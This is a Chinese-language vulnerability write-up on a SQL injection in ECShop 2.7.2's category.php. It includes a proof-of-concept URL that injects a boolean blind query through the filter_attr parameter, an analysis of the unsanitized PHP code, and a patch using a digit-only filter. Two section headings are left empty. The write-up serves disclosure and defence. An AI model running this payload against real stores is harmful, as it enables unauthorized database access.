ecshop /category.php SQL Injection Vul

標籤：

catalog

1. 漏洞描述2. 漏洞觸發條件3. 漏洞影響範圍4. 漏洞程式碼分析5. 防禦方法6. 攻防思考

 

1. 漏洞描述

Relevant Link:

http://sebug.net/vuldb/ssvid-19574

2. 漏洞觸發條件

0x1: POC

http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=145%20or%201=2  

3. 漏洞影響範圍
4. 漏洞程式碼分析

/category.php

..$filter_attr_str = isset($_REQUEST[‘filter_attr‘]) ? trim($_REQUEST[‘filter_attr‘]) : ‘0‘;//變數 $filter_attr_str 是以“.” 分開的數組$filter_attr = empty($filter_attr_str) ? ‘‘ : explode(‘.‘, trim($filter_attr_str));.. /* 擴充商品查詢條件 */if (!empty($filter_attr)){    $ext_sql = "SELECT DISTINCT(b.goods_id) FROM " . $ecs->table(‘goods_attr‘) . " AS a, " . $ecs->table(‘goods_attr‘) . " AS b " .  "WHERE ";     $ext_group_goods = array();    foreach ($filter_attr AS $k => $v)                      // 查出符合所有篩選屬性條件的商品id */    {    if ($v != 0)     {        //$v 沒有作任何處理就加入了SQL查詢，造成SQL注入        $sql = $ext_sql . "b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k] ." AND a.goods_attr_id = " . $v;        ..

5. 防禦方法

/category.php

../*對使用者輸入的$_REQUEST[‘filter_attr‘]進行轉義  */$filter_attr_str = isset($_REQUEST[‘filter_attr‘]) ? htmlspecialchars(trim($_REQUEST[‘filter_attr‘])) : ‘0‘;/* */$filter_attr_str = trim(urldecode($filter_attr_str));/* 敏感關鍵字過濾 */$filter_attr_str = preg_match(‘/^[\d\.]+$/‘,$filter_attr_str) ? $filter_attr_str : ‘‘;/**/$filter_attr = empty($filter_attr_str) ? ‘‘ : explode(‘.‘, $filter_attr_str);..foreach ($filter_attr AS $k => $v)                      // 查出符合所有篩選屬性條件的商品id */{     /* is_numeric($v) */    if (is_numeric($v) && $v !=0 )    {     ..

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

ecshop /category.php SQL Injection Vul